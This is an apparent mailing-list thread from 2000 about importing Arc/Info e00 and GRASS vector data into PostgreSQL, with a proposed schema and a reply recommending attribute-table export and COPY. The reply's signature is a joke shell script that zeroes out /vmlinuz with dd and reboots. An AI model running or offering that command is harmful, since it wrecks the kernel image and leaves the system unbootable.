Implementation in postgres

Having looked at the description of the PostgreSQL interface to GRASS, I
am convinced that it would let me do what I'm trying to do. The only
question now is how to input the data I have into a postgres database,
whether from what was loaded in the standard way or from the e00.

Is there a standard utility which will convert grass's dig format data
into postgres format? If not, is there an already written utility for
input of e00 files to postgres? Barring either of those, I would need
to do it myself, which would require some knowlege of the schema that
grass expects to find when accessing the data.

If I were to produce the database myself, my planned schema would be one
table for each of: polygons, lines and nodes with views for each
coverage (Arc/INFO terminology here). In addition, I would have tables
for displays and projects which would not hold any fundamental data but
would facilitate redrawing the maps with each change.

The contents with field names and types of the three data tables would
be as follows,:

Polygons
  Coverage:varchar, PolyID:char, PolyN:char, Bounds:box,
  numArcs:int, arcIDs:char, reversed:bollean, nodeIDs:char,
  polyIDs:char, area:float, perimeter:float, centroid:point
Lines
  Coverage:varchar, LineID:char, LineN:char, fNode:char,
  tNode:char, lPoly:char, rPoly:char, arcPath:path, length:float
Nodes
  Coverage:varchar, NodeID:char, NodeN:char, Pos:point

In addition, various coverages would have their own base tables which
would contain data specific to that coverage. For instance, roads would
contain fields for function class, rt. number, etc. A side benefit of
this approach is that it would permit various analyses, such as
aggregations, to be performed by the database that would otherwise have
to be done manually.

These fields are based on what I read about the format of e00 files and
would therefore contain everything that is available to describe each
coverage. The question is what structure should the view take so that
when any of the grass modules look query them, which the modules think
are ordinary tables, they would find what they expect. I would accept
directions to check a set of functions and files in the source.

On a separate note, I was looking through the e00 files and noticed that
there were several instances where multiple features (lines, polygons)
had the same feature-ID. Would importing with the -i flag under such
circumstances explain the problems I've been having with duplicates?

Scott Smith

On Wed, Jun 28, 2000 at 07:20:55PM -0400, Scott Smith wrote:

Having looked at the description of the PostgreSQL interface to GRASS, I
am convinced that it would let me do what I'm trying to do. The only
question now is how to input the data I have into a postgres database,
whether from what was loaded in the standard way or from the e00.

Easiest way would be to go back to Arc/Info an export all of your
attribute tables as some sort of delimited file. So, you'd have aat.foo,
pat.foo, foo.nat, etc. Then create a table for each one in Postgresql
and use the copy command to import the tables. The GRASS interface is
for the attribute data -- not the spatial/topological data. It's
somewhat difficult to represent topological spatial data in a relational
database (requires several cross referenced tables and can get messy).

Is there a standard utility which will convert grass's dig format data
into postgres format? If not, is there an already written utility for
input of e00 files to postgres? Barring either of those, I would need
to do it myself, which would require some knowlege of the schema that
grass expects to find when accessing the data.

If I were to produce the database myself, my planned schema would be one
table for each of: polygons, lines and nodes with views for each
coverage (Arc/INFO terminology here). In addition, I would have tables
for displays and projects which would not hold any fundamental data but
would facilitate redrawing the maps with each change.

The contents with field names and types of the three data tables would
be as follows,:

Polygons
  Coverage:varchar, PolyID:char, PolyN:char, Bounds:box,
  numArcs:int, arcIDs:char, reversed:bollean, nodeIDs:char,
  polyIDs:char, area:float, perimeter:float, centroid:point
Lines
  Coverage:varchar, LineID:char, LineN:char, fNode:char,
  tNode:char, lPoly:char, rPoly:char, arcPath:path, length:float
Nodes
  Coverage:varchar, NodeID:char, NodeN:char, Pos:point

In addition, various coverages would have their own base tables which
would contain data specific to that coverage. For instance, roads would
contain fields for function class, rt. number, etc. A side benefit of
this approach is that it would permit various analyses, such as
aggregations, to be performed by the database that would otherwise have
to be done manually.

These fields are based on what I read about the format of e00 files and
would therefore contain everything that is available to describe each
coverage. The question is what structure should the view take so that
when any of the grass modules look query them, which the modules think
are ordinary tables, they would find what they expect. I would accept
directions to check a set of functions and files in the source.

On a separate note, I was looking through the e00 files and noticed that
there were several instances where multiple features (lines, polygons)
had the same feature-ID. Would importing with the -i flag under such
circumstances explain the problems I've been having with duplicates?
Scott Smith

AFAIK, GRASS doesn't have any idea about things like regions, routes and
dynamic segmentation -- so those issues come up as well. It's strength
is in raster/cell based analysis/modelling.

Anywho, if you're really interested in pursuing a PostgreSQL GIS type
thingy, I've been fiddling with various approaches over the last month
or two. If the data models ever stabilize, I'll patch together some
import/export routines for GRASS. I figure GRASS is a good place to
develop data and do analysis, but PostgreSQL can be an appropriate place
for publishing queryable data -- say for online applications where
you're more interested in a spatially enhanced databases than a full GIS
environment.

--
#! /bin/sh
echo 'Linux Must Die!' | wall
dd if=/dev/zero of=/vmlinuz bs=1 \
     count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'`
shutdown -r now